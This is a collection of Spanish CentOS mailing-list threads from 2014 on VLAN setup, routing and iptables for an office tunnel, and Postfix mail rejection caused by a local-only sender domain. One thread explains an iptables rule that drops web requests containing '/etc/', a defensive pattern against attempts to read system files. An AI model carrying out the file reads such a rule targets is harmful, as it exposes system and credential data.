TYPE=Ethernet y la de mi eth0.1 es cat ifcfg-eth0.1 DEVICE=eth0.1 HWADDR=00:80:C8:E1:0E:04 BOOTPROTO=none ONBOOT=yes IPADDR=172.16.114.2 NETMASK=255.255.255.0 GATEWAY=172.16.114.1 USERCTL=no NETWORK=172.16.114.0 VLAN=yes el ifconfig me da lo siguiente (...) Pero ninguna de las IP me reponde a los ping. agregue esta regla al firewall y la VLAN 2 responde iptables -A FORWARD -i eth0 -j ACCEPT Pues entonces será un problema con el firewall, ¿no? ¿Funciona si paras el iptables? Si la respuesta es sí añade las reglas pertinentes para eth0.1, eth0.2 y eth0.4 iptables -I INPUT -i eth0.1 -p icmp -j ACCEPT iptables -I INPUT -i eth0.2 -p icmp -j ACCEPT iptables -I INPUT -i eth0.4 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.1 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.2 -p icmp -j ACCEPT iptables -I OUTPUT -o eth0.4 -p icmp -j ACCEPT ¿Que IPs tienen las máquinas desde donde haces los pings? El 11 de marzo de 2014, 11:12, Francesc Guitart fguit...@gmx.com escribió: El 11/03/2014 14:27, Pablo Alberto Flores escribió: Estimados. Tengo un centos 6.5 y deseo pasar 3 vlan en una sola interfaz. el SW ya esta configurado como trunk pero no me levanta. si reviso el SW me muestra que hay 3 ip de vlan distintas conectadas. #sh mac address-table | i 0/21 10080.c8e1.0e04DYNAMIC Fa0/21 20080.c8e1.0e04DYNAMIC Fa0/21 40080.c8e1.0e04DYNAMIC Fa0/21 #sh ip arp 0080.c8e1.0e04 Protocol Address Age (min) Hardware Addr Type Interface Internet 172.16.115.243 0 0080.c8e1.0e04 ARPA Vlan2 Internet 172.16.114.21 0080.c8e1.0e04 ARPA Vlan1 Internet 172.16.112.21 0080.c8e1.0e04 ARPA Vlan4 mi tabla de rutas es la siguente #netstat -rn Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 172.16.112.00.0.0.0 255.255.255.0 U 0 0 0 eth0.4 172.16.115.00.0.0.0 255.255.255.0 U 0 0 0 eth0.2 172.16.114.00.0.0.0 255.255.255.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.2 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0.4 0.0.0.0 172.16.115.10.0.0.0 UG0 0 0 eth0.2 pero no se conecta al mundo. ni siquiera la vlan que tiene el gw por defecto Has añadido la linea VLAN=yes en? /etc/sysconfig/network-scripts/ifcfg-eth0.1 /etc/sysconfig/network-scripts/ifcfg-eth0.2 /etc/sysconfig/network-scripts/ifcfg-eth0.4 -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart
Re: [CentOS-es] Una de Apache
El dom, 09-03-2014 a las 10:18 -0430, Wilmer Arambula escribió: Alguien me puede aclarar si esta regla es correcta y que hace -A INPUT -p tcp -m tcp -m string --dport 80 -j DROP --string /etc/ --algo bm Sí, tienes razón. Con reglas como esta se podría también bloquear el acceso a direcciones no deseadas, No sé si es correcta, debería probarla. En principio esta regla deniega (DROP) las peticiones entrantes (INPUT) de paquetes TCP por el puerto 80 que en su payload llevan el string /etc/ -- Francesc Saludos, El 8 de marzo de 2014, 20:36, Francesc Guitart fguit...@gmx.com escribió: Hola, El sáb, 08-03-2014 a las 08:28 -0300, David González Romero escribió: 2014-03-08 8:19 GMT-03:00 Miguel González miguel_3_gonza...@yahoo.es: Failban es tu amigo :) Si es cierto, con eso no tenemos duda. Pero ese tráfico debe haber alguna forma de evitarlo sin failban, solo con Apache. Creo.. o no existe tal posibilidad? Para hacerlo directamente con Apache prueba con mod_security. Yo lo hago con OSSEC que en este caso actúa como fail2ban. Saludos, David Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
Hola Cesar, Por favor, envía los mails a la lista. La discusión de tu problema se estaba realizando en ese canal. ¿Porqué cambiar? Si he entendido bien después de varios mensajes, tienes la interfaz del aparato que hace el túnel conectado directamente a la red interna. Entonces ¿porqué pasas por el firewall para ir de una oficina a otra? Hay algo que no he entendido bien. ¿Puedes explicar la situación actual desde el principio sin omitir nada? Añade por favor la salida de estos comandos: ip route ip route show table local ifconfig -a iptables -L -n Gracias. -- Francesc Guitart Mensaje original Asunto: Ayuda Fecha: Fri, 07 Mar 2014 00:03:08 -0500 De: César Martinez cmarti...@servicomecuador.com Para: Francesc Guitart fguit...@gmx.com Hola Francesc muchas gracias por tu ayuda te comento que ya logré hacer funcionar el tunel conecte directo como tu mencionaste, conecte el cable del tunel al switch y luego con ayuda del isp y un par de rutas tengo ya funcionando el tunel, ahora solo me queda un problema y es que de tras del firewall no puedo hacer ping de ningún lado, es decir desde la red 172.25.144.0 hacia la red 192.168.0.0, y viceversa, deshabilito el firewall y puedo hacer todo, agregue un par de reglas que te adjunto pero sigo sin poder conectarme, te agradezco si me puedes ayudar con este paso final, aqui mis reglas $IPTABLES -A INPUT -s 192.168.0.0/24 -j ACCEPT $IPTABLES -A OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 172.25.144.0/24 -j ACCEPT $IPTABLES -I OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE Gracias César El 06/03/2014 21:46, César Martinez escribió: Tengo medio solucionado mi problema porque ya tengo internet en el servidor y puedo hacer ping desde el servidor hacia el equipo en la otra oficina pero no puedo hacer ping desde el servidor a la otra interfaz de red del tunel, o dese un equipo que esta de tras del proxy. eth0= ip del ISP eth1 = 192.168.1.1 eth2= 192.168.0.4 Tengo estas rutas route add -net 172.25.144.0 netmask 255.255.255.0 gw 192.168.0.3 eth2 route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.1.1 eth Y mi salida de route -n es 181.113.66.72 0.0.0.0 255.255.255.248 U 0 00 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 0 00 eth1 192.168.0.0 192.168.1.1 255.255.255.0 UG0 00 eth1 192.168.0.0 0.0.0.0 255.255.255.0 U 0 00 eth2 172.25.144.0192.168.0.3 255.255.255.0 UG0 00 eth2 169.254.0.0 0.0.0.0 255.255.0.0 U 0 00 eth2 0.0.0.0 181.113.66.78 0.0.0.0 UG0 00 eth0 Hola Gracias por responder debería entonces hacer dos cosas 1.- Cambiar el segmento de la red que se genera por la eth1 por ejemplo a 192.168.1.1 2.- Crear una ruta aqui para que le puedan ver al segmento 192.168.0.X Con esto crees que funcione ya el internet y el tunel ? Sí, aunque yo cambiaría el segmento de red en eth2. Así sólo deberás cambiar dos IPs, la eth2 del CentOS y la interface del equipo que hace el túnel. Si cambias el segmento de la red en eth1 también tendrás que hacerlo en todos los equipos de la red interna. ¿La red que hay en el otro extremo del túnel es de confianza? Porqué quizás es más fácil (y lógico) conectar la interface del equipo que hace el túnel (192.168.0.3) directamente en la red local (por ejemplo en el switch donde también esta la eth1 del CentOS). ¿Entiendes por donde voy? Gracias De nada. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
0.0.0.0/0 udp dpt:139 reject-with icmp-port-unreachable ACCEPT all -- 0.0.0.0/00.0.0.0/0 ACCEPT all -- 0.0.0.0/00.0.0.0/0 state NEW ACCEPT all -- 0.0.0.0/00.0.0.0/0 state RELATED,ESTABLISHED LOGtcp -- 0.0.0.0/00.0.0.0/0 tcp flags:0x17/0x02 limit: avg 5/min burst 5 LOG flags 0 level 4 prefix `Firewalled packet:' REJECT tcp -- 0.0.0.0/00.0.0.0/0 reject-with tcp-reset DROP all -- 0.0.0.0/00.0.0.0/0 Chain OUTPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- 0.0.0.0/0172.25.144.0/24 ACCEPT all -- 0.0.0.0/00.0.0.0/0 state NEW ACCEPT all -- 0.0.0.0/0172.25.144.0/24 ACCEPT tcp -- 0.0.0.0/0172.25.144.0/24 ACCEPT all -- 0.0.0.0/00.0.0.0/0 Hola Cesar, Por favor, envía los mails a la lista. La discusión de tu problema se estaba realizando en ese canal. ¿Porqué cambiar? Si he entendido bien después de varios mensajes, tienes la interfaz del aparato que hace el túnel conectado directamente a la red interna. Entonces ¿porqué pasas por el firewall para ir de una oficina a otra? Hay algo que no he entendido bien. ¿Puedes explicar la situación actual desde el principio sin omitir nada? Añade por favor la salida de estos comandos: ip route ip route show table local ifconfig -a iptables -L -n Gracias. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
El 07/03/2014 11:24, Francesc Guitart escribió: Hola César, Prueba añadiendo esta regla: $IPTABLES -I FORWARD -d 172.25.144.0/24 -i eth1 -j ACCEPT Por cierto, en cuanto a las reglas que me mandaste en el otro mail: $IPTABLES -A INPUT -s 192.168.0.0/24 -j ACCEPT $IPTABLES -A OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 172.25.144.0/24 -j ACCEPT $IPTABLES -I OUTPUT -d 172.25.144.0/24 -j ACCEPT $IPTABLES -A POSTROUTING -t nat -o $EXTERNALIF -j MASQUERADE La primera y la cuarta son exactamente iguales. Elimina una de las dos. La tercera esta incluida dentro de la segunda (o la cuarta, como prefieras). Bórrala también. Olvidé una cosa. La quita regla parece que funciona bien, pero para ser exactos sería más bien: $IPTABLES -t nat -A POSTROUTING -o $EXTERNALIF -j MASQUERADE El 07/03/2014 11:04, César Martinez escribió: Hola Gracias por responder, paso por le proxy porque el cable del tunel de datos esta conectado ahora directo al switch que esta en el segmento 192.168.0.X, el isp creo unas rutas para enviar todo el trafico de datos a la ip 192.168.0.1 que es la ip de mi proxy actualmente. Como te menciono si bajo el firewall momentaneamente puedo hacer ping o entrar a un recurso compartido de la red 172.25.144.4 que es actualmente donde debo llegar, esta ip es un servidor windows que tiene una carpeta compartida. Te adjunto la salida de los comandos, muchas gracias por tu ayuda ip route 181.113.66.72/29 dev eth0 proto kernel scope link src 181.113.66.78 192.168.0.0/24 dev eth1 proto kernel scope link src 192.168.0.1 172.25.144.0/24 via 192.168.0.3 dev eth1 169.254.0.0/16 dev eth1 scope link default via 181.113.66.73 dev eth ip route show table local broadcast 181.113.66.79 dev eth0 proto kernel scope link src 181.113.66.78 broadcast 192.168.0.255 dev eth1 proto kernel scope link src 192.168.0.1 local 181.113.66.78 dev eth0 proto kernel scope host src 181.113.66.78 broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 broadcast 181.113.66.72 dev eth0 proto kernel scope link src 181.113.66.78 local 192.168.0.1 dev eth1 proto kernel scope host src 192.168.0.1 broadcast 192.168.0.0 dev eth1 proto kernel scope link src 192.168.0.1 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 ifconfig -a eth0 Link encap:Ethernet HWaddr 00:26:5A:84:C3:B0 inet addr:181.113.66.78 Bcast:181.113.66.79 Mask:255.255.255.248 inet6 addr: fe80::226:5aff:fe84:c3b0/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:322452 errors:0 dropped:0 overruns:0 frame:0 TX packets:315335 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:218551617 (208.4 MiB) TX bytes:50814320 (48.4 MiB) Interrupt:169 Base address:0xc000 eth1 Link encap:Ethernet HWaddr 3C:4A:92:B2:92:E4 inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::3e4a:92ff:feb2:92e4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:401472 errors:0 dropped:0 overruns:0 frame:0 TX packets:326596 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:60175972 (57.3 MiB) TX bytes:235191189 (224.2 MiB) Interrupt:177 Memory:fbdf-fbe0 eth2 Link encap:Ethernet HWaddr 54:E6:FC:80:4C:C5 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:90 Base address:0xa000 loLink encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:485 errors:0 dropped:0 overruns:0 frame:0 TX packets:485 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:59577 (58.1 KiB) TX bytes:59577 (58.1 KiB) sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b iptables -L -nChain INPUT (policy ACCEPT) target prot opt source destination DROP all -- 0.0.0.0/00.0.0.0/0 state INVALID ACCEPT all -- 0.0.0.0/0
Re: [CentOS-es] Ayuda Rutas
Hola, El 06/03/2014 1:57, César Martinez escribió: (...) Acá el resumen de mis tarjetas eth0 = ip del isp 181.XX.XX.XX eth1 = ip local de la red 192.168.0.1 eth2= ip tunel de datos 192.168.0.4 puerta de enlace 192.168.0.3 Gracias a todos los que puedan ayudarme en este dilema Para poder ayudarte un poco más manda la salida de los comandos: ip route show table local ip route cat /etc/iproute2/rt_tables Saludos Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
Hola, El 06/03/2014 17:57, César Martinez escribió: Hola perdón por la demora adjuntop lo que me pidieron, gracias [root@server ~]# ip route show table local broadcast 181.113.66.79 dev eth0 proto kernel scope link src 181.113.66.78 broadcast 192.168.0.255 dev eth1 proto kernel scope link src 192.168.0.1 broadcast 192.168.0.255 dev eth2 proto kernel scope link src 192.168.0.4 local 181.113.66.78 dev eth0 proto kernel scope host src 181.113.66.78 broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 broadcast 181.113.66.72 dev eth0 proto kernel scope link src 181.113.66.78 local 192.168.0.1 dev eth1 proto kernel scope host src 192.168.0.1 broadcast 192.168.0.0 dev eth1 proto kernel scope link src 192.168.0.1 broadcast 192.168.0.0 dev eth2 proto kernel scope link src 192.168.0.4 local 192.168.0.4 dev eth2 proto kernel scope host src 192.168.0.4 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 [root@server ~]# ip route 181.113.66.72/29 dev eth0 proto kernel scope link src 181.113.66.78 192.168.0.0/24 dev eth1 proto kernel scope link src 192.168.0.1 192.168.0.0/24 dev eth2 proto kernel scope link src 192.168.0.4 172.25.144.0/24 via 192.168.0.3 dev eth2 169.254.0.0/16 dev eth2 scope link default via 192.168.0.3 dev eth1 ^^ El problema está aquí. La gateway por defecto es 192.168.0.3 y debería ser 181.113.66.78 Prueba con: ip route change default via 181.113.66.78 dev eth0 ip route flush cache Además del tema de la gateway por defecto no entiendo porqué tienes dos interfaces en el mismo rango de red (eth1 y eth2 en 192.168.0.0/24). Seguramente te dará problemas ya que en cualquier momento saldrá a buscar la 192.168.0.3 por eth1 y no por eth2 como debería hacer. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Rutas
El 06/03/2014 18:48, César Martinez escribió: Hola Gracias por responder debería entonces hacer dos cosas 1.- Cambiar el segmento de la red que se genera por la eth1 por ejemplo a 192.168.1.1 2.- Crear una ruta aqui para que le puedan ver al segmento 192.168.0.X Con esto crees que funcione ya el internet y el tunel ? Sí, aunque yo cambiaría el segmento de red en eth2. Así sólo deberás cambiar dos IPs, la eth2 del CentOS y la interface del equipo que hace el túnel. Si cambias el segmento de la red en eth1 también tendrás que hacerlo en todos los equipos de la red interna. ¿La red que hay en el otro extremo del túnel es de confianza? Porqué quizás es más fácil (y lógico) conectar la interface del equipo que hace el túnel (192.168.0.3) directamente en la red local (por ejemplo en el switch donde también esta la eth1 del CentOS). ¿Entiendes por donde voy? Gracias De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 04/03/2014 22:10, Rodrigo Pichiñual Norin escribió: Frances esta es la salida de *telnet mail.latitud33.cl http://mail.latitud33.cl 25* Trying 67.20.125.184... Connected to mail.latitud33.cl. Escape character is '^]'. E220-box810.bluehost.com ESMTP Exim 4.80 #2 Tue, 04 Mar 2014 14:07:16 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. EHLO yyt.com 250-box810.bluehost.com Hello yyt.com [190.196.62.166] 250-SIZE 52428800 250-8BITMIME 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP MAIL FROM: root@dev2 250 OK RCPT TO: rodr...@latitud33.cl 451 Temporarily unable to process your email. Please try again later. al parecer no se puede procesar el correo electronico. ¿Has hecho la misma prueba con el MAIL FROM: root@enum-server.localdomain? Hazla también con el MAIL FROM: tucuentagm...@gmail.com. Debería funcionar. El 4 de marzo de 2014, 13:31, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 17:20, Rodrigo Pichiñual Norin escribió: Ok log...envió correcto a cuenta gmail Mar 4 13:42:28 localhost postfix/pickup[16153]: B57077AC8E: uid=0 from=root Mar 4 13:42:28 localhost postfix/cleanup[16212]: B57077AC8E: message-id=20140304134228.B57077AC8E@enum.localdomain Mar 4 13:42:28 localhost postfix/qmgr[2121]: B57077AC8E: from=root@eNUM.localdomain, size=471, nrcpt=1 (queue active) Mar 4 13:42:29 localhost postfix/smtp[16214]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4002:c07::1a]:25: Network is unreachable Mar 4 13:42:30 localhost postfix/smtp[16214]: B57077AC8E: to= rodrigo.pichin...@gmail.com, relay=gmail-smtp-in.l.google.com[74.125.137.26]:25, delay=2.1, delays=0.19/0.04/1.2/0.65, dsn=2.0.0, status=sent (250 2.0.0 OK 1393940550 e32si24471118yhi.62 - gsmtp) Mar 4 13:42:30 localhost postfix/qmgr[2121]: B57077AC8E: removed Efectivamente no se ve nada. Todo funciona OK y no da ninguna pista. Creo que también puede ser el dns interno que tenemos, el cual no resuelve algunos host No creo que sea eso. ¿Porqué afectaría tu DNS interno a que un servidor de mail externo acepte o no un mail? Puedes hacer una prueba para verificar que mi teoría es cierta. Si el servidor de mail que nos ocupa acepta conexiones telnet al puerto 25 intenta mandar un mail por comandos SMTP desde una dirección de mail que no existe, por ejemplo he...@yyt.com. Después repite los pasos con root@enum.server.localdomain. Si el error es el mismo estoy en lo cierto. Para mandar el un mail por telnet: telnet mail.latitud33.cl 25 EHLO yyt.com MAIL FROM: he...@yyt.com RCPT TO: rodr...@latitud33.cl DATA Subject: Prueba Hola pajarito sin cola. . QUIT Repite esto remplazando he...@yyt.com por root@enum-server.localdomain Saludos. El 4 de marzo de 2014, 13:17, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:56, Rodrigo Pichiñual Norin escribió: Cierto. Creo que eme estoy explicando mal. desde enum.server.localdomain puedo enviar mail a gmail echo mail de prueba | mail -s mail deprueba rodrigo.pichin...@gmail.com todo bien pero no puedo enviar a este email-.. rodr...@dominiox.cl si hago dig mx latitud33.cl resuelve bien. me captas?? Ahora sí! ^_^ El servidor de latitud33.cl está comprobando que el dominio que envía existe o es válido. Muy a menudo se hace con una simple consulta DNS inversa (PTR). Como no encuentra el dominio enum-server.localdomain en la dirección IP desde donde se envía el mail pues no lo acepta. De aquí el 550 Sender verify failed (in reply to RCPT TO command). ¿Me explico? ¿Puedes pasar el log de los mails a gmail que sí funcionan? Sólo para intentar confirmar que se trata de eso, aunque si funciona bien no sé si saldremos de dudas... El 4 de marzo de 2014, 12:52, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig mx enum-server.localdomain tampoco. El 4 de marzo de 2014, 12:13, Francesc Guitart fguit...@gmx.com escribió: Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando: 1) MTA alternatives --config mta la salida es la siguiente
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 04/03/2014 22:10, Rodrigo Pichiñual Norin escribió: Frances esta es la salida de *telnet mail.latitud33.cl http://mail.latitud33.cl 25* Trying 67.20.125.184... Connected to mail.latitud33.cl. Escape character is '^]'. E220-box810.bluehost.com ESMTP Exim 4.80 #2 Tue, 04 Mar 2014 14:07:16 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. EHLO yyt.com 250-box810.bluehost.com Hello yyt.com [190.196.62.166] 250-SIZE 52428800 250-8BITMIME 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP MAIL FROM: root@dev2 ^^ Esto no es una cuenta de mail, falta la extensión del dominio. Es normal que no te deje enviar si no respetas los estándares. Ni root@dev2 ni root@enum-server.localdomain son cuentas de mail funcionales. 250 OK RCPT TO: rodr...@latitud33.cl 451 Temporarily unable to process your email. Please try again later. al parecer no se puede procesar el correo electronico. El 4 de marzo de 2014, 13:31, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 17:20, Rodrigo Pichiñual Norin escribió: Ok log...envió correcto a cuenta gmail Mar 4 13:42:28 localhost postfix/pickup[16153]: B57077AC8E: uid=0 from=root Mar 4 13:42:28 localhost postfix/cleanup[16212]: B57077AC8E: message-id=20140304134228.B57077AC8E@enum.localdomain Mar 4 13:42:28 localhost postfix/qmgr[2121]: B57077AC8E: from=root@eNUM.localdomain, size=471, nrcpt=1 (queue active) Mar 4 13:42:29 localhost postfix/smtp[16214]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4002:c07::1a]:25: Network is unreachable Mar 4 13:42:30 localhost postfix/smtp[16214]: B57077AC8E: to= rodrigo.pichin...@gmail.com, relay=gmail-smtp-in.l.google.com[74.125.137.26]:25, delay=2.1, delays=0.19/0.04/1.2/0.65, dsn=2.0.0, status=sent (250 2.0.0 OK 1393940550 e32si24471118yhi.62 - gsmtp) Mar 4 13:42:30 localhost postfix/qmgr[2121]: B57077AC8E: removed Efectivamente no se ve nada. Todo funciona OK y no da ninguna pista. Creo que también puede ser el dns interno que tenemos, el cual no resuelve algunos host No creo que sea eso. ¿Porqué afectaría tu DNS interno a que un servidor de mail externo acepte o no un mail? Puedes hacer una prueba para verificar que mi teoría es cierta. Si el servidor de mail que nos ocupa acepta conexiones telnet al puerto 25 intenta mandar un mail por comandos SMTP desde una dirección de mail que no existe, por ejemplo he...@yyt.com. Después repite los pasos con root@enum.server.localdomain. Si el error es el mismo estoy en lo cierto. Para mandar el un mail por telnet: telnet mail.latitud33.cl 25 EHLO yyt.com MAIL FROM: he...@yyt.com RCPT TO: rodr...@latitud33.cl DATA Subject: Prueba Hola pajarito sin cola. . QUIT Repite esto remplazando he...@yyt.com por root@enum-server.localdomain Saludos. El 4 de marzo de 2014, 13:17, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:56, Rodrigo Pichiñual Norin escribió: Cierto. Creo que eme estoy explicando mal. desde enum.server.localdomain puedo enviar mail a gmail echo mail de prueba | mail -s mail deprueba rodrigo.pichin...@gmail.com todo bien pero no puedo enviar a este email-.. rodr...@dominiox.cl si hago dig mx latitud33.cl resuelve bien. me captas?? Ahora sí! ^_^ El servidor de latitud33.cl está comprobando que el dominio que envía existe o es válido. Muy a menudo se hace con una simple consulta DNS inversa (PTR). Como no encuentra el dominio enum-server.localdomain en la dirección IP desde donde se envía el mail pues no lo acepta. De aquí el 550 Sender verify failed (in reply to RCPT TO command). ¿Me explico? ¿Puedes pasar el log de los mails a gmail que sí funcionan? Sólo para intentar confirmar que se trata de eso, aunque si funciona bien no sé si saldremos de dudas... El 4 de marzo de 2014, 12:52, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig mx enum-server.localdomain tampoco. El 4 de marzo de 2014, 12:13, Francesc Guitart fguit...@gmx.com escribió: Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 05/03/2014 13:08, Rodrigo Pichiñual Norin escribió: Francesc: pero entonces como puedo enviar un mail a una cuenta gmail sin problemas?? ¿Pero no dices que los mails a las cuentas de GMAIL sí funcionan? El 5 de marzo de 2014, 5:24, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 22:10, Rodrigo Pichiñual Norin escribió: Frances esta es la salida de *telnet mail.latitud33.cl http://mail.latitud33.cl 25* Trying 67.20.125.184... Connected to mail.latitud33.cl. Escape character is '^]'. E220-box810.bluehost.com ESMTP Exim 4.80 #2 Tue, 04 Mar 2014 14:07:16 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. EHLO yyt.com 250-box810.bluehost.com Hello yyt.com [190.196.62.166] 250-SIZE 52428800 250-8BITMIME 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP MAIL FROM: root@dev2 ^^ Esto no es una cuenta de mail, falta la extensión del dominio. Es normal que no te deje enviar si no respetas los estándares. Ni root@dev2 ni root@enum-server.localdomain son cuentas de mail funcionales. 250 OK RCPT TO: rodr...@latitud33.cl 451 Temporarily unable to process your email. Please try again later. al parecer no se puede procesar el correo electronico. El 4 de marzo de 2014, 13:31, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 17:20, Rodrigo Pichiñual Norin escribió: Ok log...envió correcto a cuenta gmail Mar 4 13:42:28 localhost postfix/pickup[16153]: B57077AC8E: uid=0 from=root Mar 4 13:42:28 localhost postfix/cleanup[16212]: B57077AC8E: message-id=20140304134228.B57077AC8E@enum.localdomain Mar 4 13:42:28 localhost postfix/qmgr[2121]: B57077AC8E: from=root@eNUM.localdomain, size=471, nrcpt=1 (queue active) Mar 4 13:42:29 localhost postfix/smtp[16214]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4002:c07::1a]:25: Network is unreachable Mar 4 13:42:30 localhost postfix/smtp[16214]: B57077AC8E: to= rodrigo.pichin...@gmail.com, relay=gmail-smtp-in.l.google.com[74.125.137.26]:25, delay=2.1, delays=0.19/0.04/1.2/0.65, dsn=2.0.0, status=sent (250 2.0.0 OK 1393940550 e32si24471118yhi.62 - gsmtp) Mar 4 13:42:30 localhost postfix/qmgr[2121]: B57077AC8E: removed Efectivamente no se ve nada. Todo funciona OK y no da ninguna pista. Creo que también puede ser el dns interno que tenemos, el cual no resuelve algunos host No creo que sea eso. ¿Porqué afectaría tu DNS interno a que un servidor de mail externo acepte o no un mail? Puedes hacer una prueba para verificar que mi teoría es cierta. Si el servidor de mail que nos ocupa acepta conexiones telnet al puerto 25 intenta mandar un mail por comandos SMTP desde una dirección de mail que no existe, por ejemplo he...@yyt.com. Después repite los pasos con root@enum.server.localdomain. Si el error es el mismo estoy en lo cierto. Para mandar el un mail por telnet: telnet mail.latitud33.cl 25 EHLO yyt.com MAIL FROM: he...@yyt.com RCPT TO: rodr...@latitud33.cl DATA Subject: Prueba Hola pajarito sin cola. . QUIT Repite esto remplazando he...@yyt.com por root@enum-server.localdomain Saludos. El 4 de marzo de 2014, 13:17, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:56, Rodrigo Pichiñual Norin escribió: 